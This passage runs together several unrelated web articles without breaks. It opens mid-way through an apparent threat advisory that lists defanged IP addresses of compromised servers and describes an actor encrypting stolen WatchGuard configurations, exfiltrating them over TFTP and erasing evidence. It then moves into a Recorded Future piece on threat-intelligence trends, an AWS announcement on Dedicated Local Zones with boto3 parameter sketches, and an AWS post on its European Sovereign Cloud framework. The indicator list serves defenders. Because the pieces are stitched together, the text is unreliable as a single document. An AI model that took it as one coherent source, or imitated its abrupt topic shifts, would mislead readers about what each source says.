145.239.195[.]220 | IPv4 | 2021-08-12 | 2023-05-29 | Compromised legitimate server used to proxy threat actor traffic
103.11.190[.]99 | IPv4 | 2021-10-21 | 2023-04-02 | Compromised legitimate staging server used to exfiltrate WatchGuard configuration files
217.153.191[.]190 | IPv4 | 2023-06-10 | 2025-12-08 | Long-term infrastructure used for reconnaissance and targeting
Note: All identified IPs are compromised legitimate servers that may serve multiple purposes for the actor or continue legitimate operations. Organizations should investigate context around any matches rather than automatically blocking. We observed these IPs specifically accessing router management interfaces and attempting authentication to online services during the timeframes listed.
The observed payloads demonstrate the actor’s methodology: encrypting stolen configuration data, exfiltrating it via TFTP to compromised staging infrastructure, and removing forensic evidence.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.
The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.
This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.
Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.
Key Trends Driving Threat Intelligence Evolution
There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.
Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).
Challenges Holding Teams Back Today
Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.
Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.
These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.
Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned
In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).
Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.
Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.
Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.
Implications for 2026 Security Budgets and Investments
As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.
One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.
Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.
“After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow… We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.”
Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company
Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.
That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.
Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.
Charting the Course to 2026
Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.
By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.
So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.
With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.
Today, we’re excited to announce expanded service availability for Dedicated Local Zones, giving customers more choice and control without compromise. In addition to the data residency, sovereignty, and data isolation benefits they already enjoy, the expanded service list gives customers additional options for compute, storage, backup, and recovery.
Dedicated Local Zones are AWS infrastructure fully managed by AWS, built for exclusive use by a customer or community, and placed in a customer-specified location or data center. They help customers across the public sector and regulated industries meet security and compliance requirements for sensitive data and applications through a private infrastructure solution configured to meet their needs. Dedicated Local Zones can be operated by local AWS personnel and offer the same benefits of AWS Local Zones, such as elasticity, scalability, and pay-as-you-go pricing, with added security and governance features.
Since being launched, Dedicated Local Zones have supported a core set of compute, storage, database, containers, and other services and features for local processing. We continue to innovate and expand our offerings based on what we hear from customers to help meet their unique needs.
More choice and control without compromise
The following new services and capabilities deliver greater flexibility for customers to run their most critical workloads while maintaining strict data residency and sovereignty requirements.
New generation instance types
To support complex workloads in AI and high-performance computing, customers can now use newer generation instance types, including Amazon Elastic Compute Cloud (Amazon EC2) generation 7 with accelerated computing capabilities.
AWS storage options
AWS storage options include two Amazon S3 storage classes: Amazon Simple Storage Service (Amazon S3) Express One Zone, which offers high-performance storage for customers’ most frequently accessed data, and Amazon S3 One Zone-Infrequent Access, which is designed for data that is accessed less frequently and is ideal for backups.
Advanced block storage capabilities are delivered through Amazon Elastic Block Store (Amazon EBS) gp3 and io1 volumes, which customers can use to store data within a specific perimeter to support critical data isolation and residency requirements. By using the latest AWS general purpose SSD volumes (gp3), customers can provision performance independently of storage capacity with an up to 20% lower price per gigabyte than existing gp2 volumes. For intensive, latency-sensitive transactional workloads, such as enterprise databases, provisioned IOPS SSD (io1) volumes provide the necessary performance and reliability.
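As a minimal sketch of provisioning performance independently of capacity with gp3, the following builds the parameters for an EC2 CreateVolume call. The Availability Zone name, size, IOPS, and throughput values are hypothetical placeholders; substitute the zone name of your Dedicated Local Zone.

```python
# Sketch: provisioning a gp3 EBS volume whose IOPS and throughput are set
# independently of its capacity. All concrete values here are hypothetical.

def build_gp3_volume_request(az, size_gib, iops, throughput_mibps):
    """Build the parameters for an EC2 CreateVolume call for a gp3 volume."""
    return {
        "AvailabilityZone": az,          # e.g. the Dedicated Local Zone's AZ name
        "VolumeType": "gp3",
        "Size": size_gib,                # capacity in GiB
        "Iops": iops,                    # provisioned independently of Size
        "Throughput": throughput_mibps,  # MiB/s, also independent of Size
    }

params = build_gp3_volume_request("us-east-1-xyz-1a", size_gib=100,
                                  iops=6000, throughput_mibps=250)
# With boto3 and appropriate credentials, the call would be:
# import boto3
# boto3.client("ec2").create_volume(**params)
```

Keeping IOPS and throughput as separate parameters is what distinguishes gp3 from gp2, where performance scales with volume size.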
Backup and recovery capabilities
We have added backup and recovery capabilities through Amazon EBS Local Snapshots, which provides robust support for disaster recovery, data migration, and compliance. Customers can create backups within the same geographical boundary as EBS volumes, helping meet data isolation requirements. Customers can also create AWS Identity and Access Management (IAM) policies for their accounts to enable storing snapshots within the Dedicated Local Zone. To automate the creation and retention of local snapshots, customers can use Amazon Data Lifecycle Manager (DLM).
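To illustrate automating local snapshot creation and retention, the following is a minimal sketch of the parameters for a Data Lifecycle Manager CreateLifecyclePolicy call that snapshots tagged EBS volumes daily and retains the seven most recent copies. The role ARN, tag key, and tag value are hypothetical placeholders.

```python
# Sketch: an Amazon Data Lifecycle Manager (DLM) policy that snapshots tagged
# EBS volumes daily and retains seven snapshots. The role ARN and tag values
# are hypothetical placeholders.

def build_dlm_policy_request(role_arn, tag_key, tag_value):
    """Build the parameters for a DLM CreateLifecyclePolicy call."""
    return {
        "ExecutionRoleArn": role_arn,
        "Description": "Daily local snapshots for tagged volumes",
        "State": "ENABLED",
        "PolicyDetails": {
            "ResourceTypes": ["VOLUME"],
            "TargetTags": [{"Key": tag_key, "Value": tag_value}],
            "Schedules": [{
                "Name": "DailySnapshots",
                "CreateRule": {"Interval": 24, "IntervalUnit": "HOURS",
                               "Times": ["03:00"]},
                "RetainRule": {"Count": 7},  # keep the seven most recent snapshots
            }],
        },
    }

policy_request = build_dlm_policy_request(
    "arn:aws:iam::123456789012:role/dlm-lifecycle-role",  # hypothetical role
    tag_key="backup", tag_value="daily")
# With boto3: boto3.client("dlm").create_lifecycle_policy(**policy_request)
```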
Customers can use local Amazon Machine Images (AMIs) to create and register AMIs while maintaining underlying local EBS snapshots within Dedicated Local Zones, helping achieve adherence to data residency requirements. By creating AMIs from EC2 instances or registering AMIs using locally stored snapshots, customers maintain complete control over their data’s geographical location.
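As a sketch of registering an AMI from a locally stored snapshot, the following builds the parameters for an EC2 RegisterImage call. The image name and snapshot ID are hypothetical placeholders; the snapshot would be one stored within the Dedicated Local Zone.

```python
# Sketch: registering an AMI from a locally stored EBS snapshot so that the
# underlying data stays within the Dedicated Local Zone. The snapshot ID and
# image name are hypothetical placeholders.

def build_register_image_request(name, snapshot_id):
    """Build the parameters for an EC2 RegisterImage call."""
    return {
        "Name": name,
        "Architecture": "x86_64",
        "VirtualizationType": "hvm",
        "RootDeviceName": "/dev/xvda",
        "BlockDeviceMappings": [{
            "DeviceName": "/dev/xvda",
            "Ebs": {
                "SnapshotId": snapshot_id,   # local snapshot in the zone
                "DeleteOnTermination": True,
            },
        }],
    }

ami_request = build_register_image_request("my-local-ami",
                                           "snap-0123456789abcdef0")
# With boto3: boto3.client("ec2").register_image(**ami_request)
```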
GovTech Singapore focuses on the nation’s digital government transformation and on enhancing the public sector’s engineering capabilities. Our collaboration with GovTech Singapore involved configuring their Dedicated Local Zones with specific services and capabilities to support their workloads and meet stringent regulatory requirements. This architecture addresses data isolation and security requirements while maintaining consistency and efficiency across Singapore Government cloud environments.
With the availability of the new AWS services with Dedicated Local Zones, government agencies can simplify operations and meet their digital sovereignty requirements more effectively. For instance, agencies can use Amazon Relational Database Service (Amazon RDS) to create new databases rapidly. Amazon RDS in Dedicated Local Zones helps simplify database management by automating tasks such as provisioning, configuring, backing up, and patching. This collaboration is just one example of how AWS innovates to meet customer needs and configures Dedicated Local Zones based on specific requirements.
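As a minimal sketch of creating a database pinned to a Dedicated Local Zone, the following builds the parameters for an RDS CreateDBInstance call. The instance identifier, zone name, instance class, and credentials are hypothetical placeholders.

```python
# Sketch: creating an Amazon RDS database instance pinned to a Dedicated
# Local Zone. The zone name, identifier, and settings below are hypothetical.

def build_rds_instance_request(identifier, az):
    """Build the parameters for an RDS CreateDBInstance call."""
    return {
        "DBInstanceIdentifier": identifier,
        "Engine": "postgres",
        "DBInstanceClass": "db.m5.large",
        "AllocatedStorage": 100,           # GiB
        "AvailabilityZone": az,            # the Dedicated Local Zone's AZ name
        "MasterUsername": "dbadmin",
        "ManageMasterUserPassword": True,  # RDS manages the password for you
        "BackupRetentionPeriod": 7,        # days of automated backups
    }

db_request = build_rds_instance_request("agency-db", "us-east-1-xyz-1a")
# With boto3: boto3.client("rds").create_db_instance(**db_request)
```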
Chua Khi Ann, Director of GovTech Singapore’s Government Digital Products division, who oversees the Cloud Programme, shared: “The deployment of Dedicated Local Zones by our Government on Commercial Cloud (GCC) team, in collaboration with AWS, now enables Singapore government agencies to host systems with confidential data in the cloud. By leveraging cloud-native services like advanced storage and compute, we can achieve better availability, resilience, and security of our systems, while reducing operational costs compared to on-premises infrastructure.”
Get started with Dedicated Local Zones
AWS understands that every customer has unique digital sovereignty needs, and we remain committed to offering customers the most advanced set of sovereignty controls and security features available in the cloud. Dedicated Local Zones are designed to be customizable, resilient, and scalable across different regulatory environments, so that customers can drive ongoing innovation while meeting their specific requirements.
Ready to explore how Dedicated Local Zones can support your organization’s digital sovereignty journey? Visit AWS Dedicated Local Zones to learn more.
At Amazon Web Services, we’re committed to deeply understanding the evolving needs of both our customers and regulators, and rapidly adapting and innovating to meet them. The upcoming AWS European Sovereign Cloud will be a new independent cloud for Europe, designed to give public sector organizations and customers in highly regulated industries further choice to meet their unique sovereignty requirements. The AWS European Sovereign Cloud expands on the same strong foundation of security, privacy, and compliance controls that apply to other AWS Regions around the globe with additional governance, technical, and operational measures to address stringent European customer and regulatory expectations. Sovereignty is the defining feature of the AWS European Sovereign Cloud and we’re using an independently validated framework to meet our customers’ requirements for sovereignty, while delivering the scalability and functionality you expect from the AWS Cloud.
Today, we’re pleased to share further details about the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). This reference framework aligns sovereignty criteria across multiple domains, such as governance independence, operational control, data residency, and technical isolation. Working backwards from our customers’ sovereign use cases, we aligned controls to each of the criteria, and the AWS European Sovereign Cloud is undergoing an independent third-party audit to verify that the design and operations of these controls conform to AWS sovereignty commitments. Customers and partners can also leverage the ESC-SRF as a foundation upon which they can build their own complementary sovereignty criteria and controls when using the AWS European Sovereign Cloud.
To clearly explain how the AWS European Sovereign Cloud meets sovereignty expectations, we’re publishing the ESC-SRF in AWS Artifact, including the criteria and control mapping. In AWS Artifact, our self-service audit artifact retrieval portal, you have on-demand access to AWS security and compliance documents and AWS agreements. You can now use the ESC-SRF to define best practices for your own use case, map these to controls, and illustrate how you meet and even exceed the sovereign needs of your customers.
A transparent and validated sovereignty model
The ESC-SRF has been built from customer feedback, regulatory requirements across the European Union (EU), industry frameworks, AWS contractual commitments, and partner input. The ESC-SRF is industry and sector agnostic: it addresses fundamental sovereignty needs and expectations at the foundational layer of our cloud offerings, and adds sovereignty-specific requirements and controls that apply exclusively to the AWS European Sovereign Cloud. Each criterion is implemented through sovereign controls that will be independently validated by a third-party auditor.
The framework builds on core AWS security capabilities, including encryption, key management, access governance, AWS Nitro System-based isolation, and internationally recognized compliance certifications. The framework adds sovereign-specific governance, technical, and operational measures such as independent EU corporate structures, dedicated EU trust and certificate services, operations by AWS EU-resident personnel, strict residency for customer data and customer created metadata, separation from all other AWS Regions, and incident response operated within the EU.
These controls are the basis of a dedicated AWS European Sovereign Cloud System and Organization Controls (SOC) 2 attestation. The ESC-SRF establishes a solid foundation for sovereignty of the cloud, so that customers can focus on defining sovereignty measures in the cloud that are tailored to their goals, regulatory needs, and risk posture.
How you can use the ESC-SRF
The ESC-SRF describes how AWS implements and validates sovereignty controls in the AWS European Sovereign Cloud. AWS treats each criterion as binding and its implementation will be validated by an independent third-party auditor in 2026. While most customers don’t operate at the size and scale of AWS, you can use the ESC-SRF as both an assurance model and a reference framework you can adapt to your specific use cases.
From an assurance perspective, it provides end-to-end visibility for each sovereignty criterion through to its technical implementation. We will also provide third-party validation in the AWS European Sovereign Cloud SOC 2 report. Customers can use this report with internal auditors, external assessors, supervisory authorities, and regulators. This can reduce the need for ad-hoc evidence requests and supports customers by providing them with evidence to demonstrate clear and enforceable sovereignty assurances.
From a design perspective, you can refer to the framework when shaping your own sovereignty architecture, selecting configurations, and defining internal controls to meet regulatory, contractual, and mission-specific requirements. Because the ESC-SRF is industry and sector agnostic, you can apply its criteria to suit your own unique needs; depending on your sovereign use case, not all criteria may apply. The ESC-SRF can also be used in conjunction with AWS Well-Architected, which can help you learn, measure, and build using architectural best practices. Where appropriate, you can create your own version of the ESC-SRF, map it to controls, and have them tested by a third party. To download the ESC-SRF, visit AWS Artifact (login required).
A strong, clear foundation
The publication of the ESC-SRF is part of our ongoing commitment to delivering on the AWS Digital Sovereignty Pledge through transparency and assurances to help customers meet their evolving sovereignty needs with assurances designed, implemented, and validated entirely within the EU. With the framework, customers can build solutions in the AWS European Sovereign Cloud with confidence and a clear understanding of how they can meet their sovereignty goals using AWS.
For more information about the AWS European Sovereign Cloud, visit aws.eu.
If you have feedback about this post, submit comments in the Comments section below.